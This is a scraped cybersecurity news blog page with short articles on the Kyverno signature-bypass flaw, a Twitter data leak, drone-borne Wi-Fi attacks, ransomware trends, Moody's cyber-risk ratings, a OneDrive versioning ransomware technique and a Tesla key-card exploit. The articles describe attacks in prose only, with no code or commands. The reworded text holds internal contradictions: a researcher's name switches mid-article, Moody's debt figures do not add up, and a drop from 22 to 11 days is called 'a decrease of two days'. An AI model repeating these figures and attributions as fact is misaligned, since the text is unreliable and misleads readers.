This is followed by a second request from the admission controller for the manifest of the signed image so that the digest for mutation can be retrieved - and it can then be used to alter the human-readable tag associated with the container. In this instance, no signing validation is performed. This allows a different, unsigned and malicious image to be returned by the malicious registry. This image is ultimately the one that will run on your system if you push the button to start it. 

This is a classic example of a TOCTOU problem, which means a time-of-check-to-time-of-use problem, in which an attacker can bait and switch their victim, according to a research paper published by ARMO. 

Because the image manifest which is going to be used in the end is a different one from the one that was verified, it gives the attacker the chance to trick the client. 

Kyverno users should update to version 1.8.5 as soon as possible since this vulnerability was introduced in version 1.8.3 and has been fixed in the updated version. It is ensured that the same hash of the image will be used for modifying the workload specification and verifying the signature in the patch. 

In particular, this vulnerability affects only Kubernetes with the Kyverno container manager. Hirschberg warned that other methods of verifying image signatures also need to take care not to be vulnerable to this technique. 

Concerns About Container Security are on the Rise 

Hirschberg has noted that containers are an excellent target for cybercriminals because they are typically hosted in the cloud. This gives them access to a huge amount of computational resources, which are extremely valuable and expensive. This enables hackers to steal computational resources and data in a relatively short time while also staying unnoticed for a long period. 

According to him, there are no exact statistics. However, based on the current trend of containers being widely adopted, it is clear that this type of problem is becoming more prevalent in the industry. 

"Security teams are learning how to handle them, and Kubernetes in general. I don't think that it is a true 'blind spot,' but container security teams are still learning the whole environment with many neglected areas", Hirschberg added.

Even though image signature verification has just begun to take off, admission controllers still represent one of those potential areas that may have been neglected due to the early stages of its adoption. Nonetheless, they are also part of a broader dialogue that should be conducted about supply chain software security in a way that considers them an imperative issue. 

During the SolarWinds attack, Hirschberg indicated that the world saw how sensitive this issue is when it comes to trusting the security of external code. Kyverno is a security tool that includes signature validation for the first time in the Kubernetes world, and with this, it introduces additional vulnerabilities. However, it does seem that with these vulnerabilities come security improvements that will enable users to overcome this issue in the future.
Read more »
Vulnerability
9TO5Mac Cyberattacks Data Breach Online data breach Twitter Vulnerability

Researchers Updated Twitter Data Breach as “More Harmful” Than Reported


Last year, Twitter exposed more than five million phone numbers and email addresses following a massive data breach. The research team of 9TO5Mac has been provided with evidence that suggests the same security vulnerability was exploited by multiple threat actors at the same time. Additionally, several sources have advertised the availability of the hacked data on the dark web for sale as well. 

This vulnerability was first reported back in January by HackerOne. Using this tool, anyone could enter a phone number or e-mail address and then find the Twitter account associated with that number or email address. A Twitter handle can be easily converted into an internal identifier used by Twitter, even though it is an internal identifier utilized by Twitter. 

In reality, a threat actor would be able to construct a single database that would contain Twitter handles, email addresses, and phone numbers accumulated from the web. 

When Twitter released an announcement in May, it confirmed that the vulnerability existed and had been patched, but it did not mention that anyone had exploited it. 

According to the restoration privacy report, a hacker had indeed used the vulnerability to gain access to millions of accounts around the world. He had gotten access to personal information as a result. 

There has been a massive breach of Twitter data, and not just one

In a Twitter thread yesterday, there was a suggestion that some threat actors had accessed the same personal data in more than one way. Having seen evidence of multiple breaches, 9to5Mac can now verify that this is indeed the case. 

The security researchers explained that, in a previous report, they had seen a dataset that contained the same information in a different format, and the source told researchers that it was "definitely a different threat actor." This was just one of several files that they had seen. The researchers at 9TO5Mac found that the dataset was just one of several similar files. 

The majority of the data is based on Twitter users in the UK, most EU member countries, and several US states. 

Essentially, the setting the security researchers are referring to here refers to a setting that is quite deeply buried within the settings of Twitter. This setting appears to be on by default if you open Twitter's settings. 

An estimated 500k record was downloaded within one hour by the bad actors, it has been reported. On the dark web, multiple sources have offered this data for sale for a price between $5,000 and $10,000. 

It has been reported that a security expert's account has been suspended after tweeting about it. There was also another security specialist whose Twitter account was suspended the same day. Chad Loder, a well-recognized computer security expert, predicted Twitter's reaction within minutes of it being announced and it was confirmed by other experts. 

There is evidence that multiple hackers have obtained the same data and combined it with other data sourced from other breaches to steal the information.
Read more »
Vulnerability
Cyber Attacks Cybersecurity Drones Vulnerability

Cyber-Spy Exploits are Being Dropped by Drones


The use of drones equipped with cyber-spying equipment was previously limited to abstract academic discussions among cybersecurity enthusiasts, but now, drones can be used in the real world to penetrate networks and steal information. 

On October 10, cybersecurity researcher Greg Linares published a Twitter thread providing a brief overview of a drone-based cyberattack he had recently witnessed while working as a freelance researcher.  

According to Mr. Gohel, the incident began when an unnamed financial company picked up unusual traffic on its network as a result of the hack. In the process of tracing the Wi-Fi signal, the con men discovered two drones on the roof and alongside, they also discovered some other activity on the network. 
 
Linares described one of the drones as being a modified DJI Phantom which carried what he called a "modified Wifi Pineapple device" and the other as being a similarly modified DJI Matrice 600 device which contained "a Raspberry Pi, batteries, GPD mini laptop, a 4G modem, and another Wi-Fi device," he explained. 

In addition to the successful cyberattack, Linares explained that the attackers were also able to access devices connected to the Atlassian Confluence site from the internal page. This was done to steal credentials and other information. During the threat hunters' investigation, they discovered that one of the drones had been damaged but was still functional. 

"In light of the limited success of this attack, it appears that once the attackers were detected, they crashed the drone as they were recovering it from the ground," Linares claimed on Twitter.

He further explained that a drone attack of this kind would probably not cost more than $15,000 to be put together, although he did not provide an exact figure. 

As he explained in his warning, attackers spend this amount of money on internal devices and do not care about destroying them. "This is the third real-world attack I have encountered from a drone in the last two years," he added. 
Read more »
Vulnerability management
Cyber Attacks malware OST Ransomware RDP Secureworks Vulnerability Vulnerability management

Ransomware is Now the Top Attack Vector Due to Bug Exploitation

 



Security experts at Secureworks have revealed that vulnerability exploitation has accounted for 52% of ransomware incidents investigated by the company over the past 12 months. This makes it the number one initial access vector for attackers, according to a new report published by the company.

As an annual report, the security firm's State of the Threat report is compiled based on the insight gathered from the anti-terrorism unit of the organization over the past year.

A leading ransomware researcher has found that last year, ransomware actors mainly used vulnerabilities found in systems exposed to the Internet to increase their effectiveness, rather than to take advantage of credentials  often associated with the compromise of Remote Desktop Protocol (RDP), and using malicious emails.

Reports suggested that this shift in tactics may directly result from a significant imbalance between the capabilities of threat actors and network defenders. This imbalance may explain this shift in tactics.

At the same time as threats are rapidly weaponizing newly discovered vulnerabilities, developers of offensive security tools (OSTs) are also driven by the need to generate profit or keep their tools relevant  to implement updated exploit code as soon as possible, the report illustrated. 

A lot of people often overlook the fact that responsible disclosure is often about not having to wait for patches to become available. Even if a patch is available, the process of patching a vulnerability in an enterprise environment is far more complicated and much slower than the process for threat actors or OST developers of weaponizing publicly accessible exploit code.

As a result, vulnerability management teams must also take precautions against the persistent threat of credential-based attacks. In a recent report, Secureworks reported a 150% growth in the use of info-stealers that are designed to grab credentials from networks and gain access to them in an attempt to steal sensitive information.

There has been an investigation launched by an anti-virus vendor on a single day in June, during which it claimed to have observed over 2.2 million credentials, which were collected by criminals who stole information and made them available for sale on an underground platform.

According to Secureworks, ransomware continues to represent the number one threat to global organizations, accounting for more than a quarter of the attacks analyzed by the company. Among the threats that have been reported, most of them have been linked to Russian cybercrime groups.

So far this year, the good news is that the median dwell time of attackers has dropped from 22 days in 2021 to 11 days. This is a decrease of two days from last year, but it still leaves attackers with plenty of time to steal data from organizations and deploy the payloads for ransomware attacks.

Preventions for ransomware attacks


Safeguarding your systems from malware attacks includes simple yet effective measures like

• Never click on unknown or unauthorized links or stores.
• Never input your personal information on unofficial stores or websites.
• Never click on any unknown attachments on emails.
• Never plug into any unknown USB sticks.
• Never download any software or application from unauthorized sources.
• Always keep your systems up-to-date.
• Always work under VPN security while using public wi-fi.
 
To ensure that the vulnerabilities do not get exploited, you need to identify and address them as soon as possible. Keeping track of your vital systems and their security is impossible without implementing an effective vulnerability management system (VM). 

Choosing the right VM tools is important as they provide accuracy, guidance in the right directions, and efficiency, to help your team in dealing with the most critical vulnerabilities. Once you establish a scalable and sustainable VM program you will be capable of defending your systems from ransomware attacks.
Read more »
Vulnerability
Cyber Attacks Cyber-risk Cyberattack Digital Footprint Digitalization Vulnerability

Moody's Intensifies its Scrutiny Of the 'Riskiest' Sectors Of the Economy

 



According to Moody's Investors Service, nearly $22 trillion of global rated debt has a "high" or "very high" level of cyber-risk exposure. This includes electrical, gas, and water utilities, as well as hospitals, which are among the sectors with the greatest risk of cyberattacks.

In total, Moody's has rated nearly 80 trillion dollars in debt across 71 different sectors across the globe. This represents a quarter of Moody's $180 trillion in debt that Moody's has rated across 71 different sectors worldwide. This represents an increase of nearly a billion dollars from the firm's 2019 numbers.

According to Moody, the Cyber Heatmap takes into account two factors, namely exposure and mitigation. It weighs both equally across all the sectors that it rates for this report.

A major component of exposure is the industry's "systemic role" - the fact that it is appealing from an attacker's perspective in terms of disrupting a wide array of industries, along with its interconnectedness with other sectors. It has also been emphasized that "digitalization" has increased the attack surface by extending its digital footprint.

The mitigation plan will include measures to reduce perimeter vulnerability as well as basic cybersecurity practices based on financial loss estimates. While determining perimeter vulnerability, Moody's takes into account at-risk open ports and patching cadence, which it gathers from data and metrics provided by cyber-ratings company BitSight, in which Moody's owns a minority stake, which provides data and metrics about open ports and patching schedules.

"It has been mentioned before that poor patches can have a significant impact on a company's risk of ransomware, as well as reports of a high rate of ransomware instances," BitSight chief risk officer Derek Vadala said in a press release.

According to Moody's, this year's Heatmap provides insight into cyber risk within the 71 sectors. The information is based on exposures and mitigations, which Moody's has categorised as "low," "moderate," "high" and "very high" risk. Utility companies were found to have high levels of cyber risk.

In this sector, which has a total amount of $2.5 billion in collective debt rated by Moody's, there are both regulated and self-regulated electric utilities operating in the generation, transmission, and distribution of electricity and gas. There are also unregulated electric and power companies, as well as water and wastewater companies. Moody's noted, "this does not mean the issuers within these sectors have weak cybersecurity practices."

Most economists believe that it has more to do with the "multiplier effect across an economy," as per the report. Cyberattacks that knock out a regional power grid, for example, will have far more consequences than simply for the utility itself. Hospitals may be unable to provide life-saving surgery or critical medicine to patients if a cyberattack knocks them out of service. For assisted living facilities, it would be extremely challenging for them to keep their elderly residents comfortable during heat waves or cold snaps. This is because they cannot provide heat or air conditioning.

There is no doubt that this is why critical infrastructure has become such an attractive target for cybercriminals seeking to cause the most damage, as evidenced by the seemingly constant barrage of government warnings regarding nation-state threat groups targeting power systems and infrastructure.

As far as cyber risk is concerned, non-profit hospitals also ranked extremely high when it comes to the threats they face. In Moody's view, non-profit hospitals are particularly attractive targets for attackers because of the huge amount of data that these institutions possess, as well as the average mitigation measures, they have in place to reduce the impact of potential cyber threats. 

Banks, the technology sector, telecommunications, and midstream energy are some of the sectors with the highest levels of risk. Meanwhile, in the Heatmap, some sectors have moderate levels of risk, such as advanced economies and emerging regions, regional and local governments, manufacturing, retail, and apparel, and integrated oil.

In conclusion, low-risk sectors include structured finance, real estate, independent exploration and production, mining, and public housing, which are all low-risk sectors. The analysis evinces how there has been a significant increase in the number of ransomware attacks against hospitals and healthcare organizations over the last few years which in turn calls for strict cyber security measures. 
Read more »
Vulnerability
Attack Encryption Extortion Flaws Microsoft Ransomware Vulnerabilities and Exploits Vulnerability

Researchers Alert About Ransomware Attacks Targeting Microsoft Cloud ‘Versioning’ Feature

Researchers detected a functionality in Office 365 that enables cybercriminals to ransom items stored on SharePoint and OneDrive. When the researchers informed Microsoft, they were assured that the system was functioning as designed and it is a feature rather than a vulnerability. 

Files stored and updated on the cloud have long been thought to be resistant to encryption extortion — the autosave and versioning capabilities should offer enough backup capability. Researchers at Proofpoint have displayed that this is a false assumption. They reported, “Our research focused on… SharePoint Online and OneDrive… and shows that ransomware actors can now target organizations’ data in the cloud and launch attacks on cloud infrastructure.” 

There are two ways to accomplish this using the Microsoft versioning feature (which allows the user to specify the maximum number of older versions to be stored). Older versions beyond this level are designed difficult, if not impossible to recover. The first attack is more theoretical than practical, while the second is undeniably practical. The maximum number of revisions of a document that may be saved by default is 500. Simply said, the attacker modifies and encrypts the file 501 times. 

The changes do not have to be significant - just enough to cause the system to save the new (encrypted) version. All versions of the document will be encrypted by the completion of the procedure, and the file will be unrecoverable without the decryption key. This is a theoretical attack. In actuality, it would be loud and easily discovered. The second method is more practical: utilise the built-in user-controlled versioning tool to reduce the number of stored versions to one. 

Every SharePoint and OneDrive document library includes a user-configurable parameter for the number of stored versions, which can be found under list settings for each document library. Setting the version limit to zero does not help an attacker since it does not erase older versions that the user can still recover. 

If the limit is set to one, the file only has to be encrypted twice before the user loses access to its contents. If information is exfiltrated before encryption, the attacker has the option of launching a second extortion attempt. The attack chain includes initial access via compromised or hijacked user identities, account takeover and discovery, versioning reduction, file exfiltration, and encryption, and extortion. 

If the file owner keeps a local copy of the file, the impact of this attack will be limited. In this case, the attacker must compromise both the endpoint and the cloud account to ensure success. Proofpoint followed the Microsoft disclosure route and submitted the vulnerability to Microsoft before publicly revealing it. 

Microsoft stated that, first, the versioning settings function properly, and that, second, previous versions of files can potentially be retrieved and restored for an additional 14 days with the aid of Microsoft Support. 

“However,” write the researchers, “Proofpoint attempted to retrieve and restore old versions through this process (i.e., with Microsoft Support) and was not successful. Secondly, even if the versioning settings configuration workflow is as intended, Proofpoint has shown that it can be abused by attackers towards cloud ransomware aims.”

Therefore, the conclusion of the story is straightforward do not think files saved and updated in the cloud are immune to extortion attempts. Ransomware mitigation procedures must still be in place.
Read more »
Vulnerability
Attack Attacker Exploits Key Card Unauthorized Vulnerabilities and Exploits Vulnerability

Researcher Demonstrated How Tesla Key Card Feature Can be Exploited to Steal Cars

 

A researcher demonstrated how a Tesla key card functionality launched last year might be misused to add an unauthorised key that enables an attacker to access and start a vehicle. 

Martin Herfurt, an Austria-based member of the Trifinite research group that specialises in Bluetooth security, conducted the study. Herfurt's research focused on key card access modifications made by Tesla in August 2021, which removed the necessity for customers to place the key card on the central console after using it to open the vehicle. 

The researcher discovered that when a Tesla is opened through NFC using the key card, there is a 130-second window during which an attacker within the Bluetooth range of the targeted vehicle may add their own key. The attack exploits Tesla's VCSEC protocol, which manages communication between the automobile, the phone app, and the key fob. 

Findings by the researcher: 

During such an assault, the infotainment system makes no attempt to warn the victim that a new key has been inserted. According to the researcher, he tried the attack on the Tesla Model 3 and Model Y, but he believes it should also work on the newer Model S and Model X. At the recent Pwn2Own 2022 hacking competition, hackers won $75,000 for an attack targeting Tesla's infotainment system. Herfurt intended to show off his attack at Pwn2Own, but relay attacks were not permitted. 

In reality, he claimed to have identified the authorisation timer attack vector in September 2021 but had been keeping it for Pwn2Own. The researcher stated that he did not inform Tesla about his recent findings before revealing them since he considered the company needed to be aware of the problem. 
Following his disclosure, he received confirmation from others who reported a very issue to Tesla months ago that Tesla was aware of the vulnerability. 

According to the researcher, Tesla recommends using the PIN2Drive function, which requires customers to input a PIN before driving away, but he produced a video last week demonstrating how an attacker may overcome PIN2Drive. Tesla is yet to react to a comment request.

Herfurt is working on TeslaKee, a new smartphone application that is said to safeguard Tesla vehicles from these sorts of relay attacks. Herfurt demonstrated another approach to stealing a Tesla in May. The attacker utilised two Raspberry Pi devices to relay the radio signal between the Phone Key and an automobile over a considerable distance.
Read more »
Subscribe to: Posts (Atom)